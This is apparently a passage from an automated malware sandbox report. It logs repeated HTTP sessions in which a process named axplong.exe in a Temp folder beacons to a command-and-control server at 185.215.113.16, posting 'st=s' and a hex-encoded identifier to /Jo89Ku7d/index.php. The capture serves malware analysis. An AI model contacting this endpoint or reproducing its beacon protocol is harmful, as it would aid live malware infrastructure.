                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:08.190907955 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      5 | 192.168.2.5 | 53652 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:08.312820911 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:09.065239906 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:08 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:09.065877914 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:09.321120977 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:09 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      6 | 192.168.2.5 | 53653 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:09.439378977 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:10.221355915 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:10.222194910 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:10.481286049 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:10 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      7 | 192.168.2.5 | 53654 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:10.595560074 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:11.379457951 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:11.382344961 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:11.635154009 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:11 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      8 | 192.168.2.5 | 53655 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:11.752181053 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:12.595117092 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:12.596424103 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:12.879328966 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:12 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      9 | 192.168.2.5 | 53656 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:12.999011993 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:13.813911915 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:13.814675093 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:14.070489883 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:13 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      10 | 192.168.2.5 | 53657 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:14.189224005 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:14.946468115 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:14 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:14.947299957 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:15.200756073 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      11 | 192.168.2.5 | 53658 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:15.311961889 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:16.117976904 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:15 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:16.118776083 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:16.517405987 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      12 | 192.168.2.5 | 53659 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:16.643441916 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:17.400667906 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:17.401375055 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:17.661652088 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      13 | 192.168.2.5 | 53660 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:17.780222893 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:18.545650959 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:18.546478033 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:18.798448086 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      14 | 192.168.2.5 | 53661 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:18.934989929 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:19.691845894 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:19.694761038 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:19.945610046 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                      15 | 192.168.2.5 | 53662 | 185.215.113.16 | 80 | 7856 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      Timestamp | Bytes transferred | Direction | Data
                      Jul 26, 2024 13:44:20.251146078 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 26, 2024 13:44:21.031054974 CEST | 219 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 26, 2024 13:44:21.039736032 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 156
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 43 41 45 34 33 43 46 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDFCAE43CFFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                      Jul 26, 2024 13:44:21.316771984 CEST | 196 | IN | HTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 26 Jul 2024 11:44:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
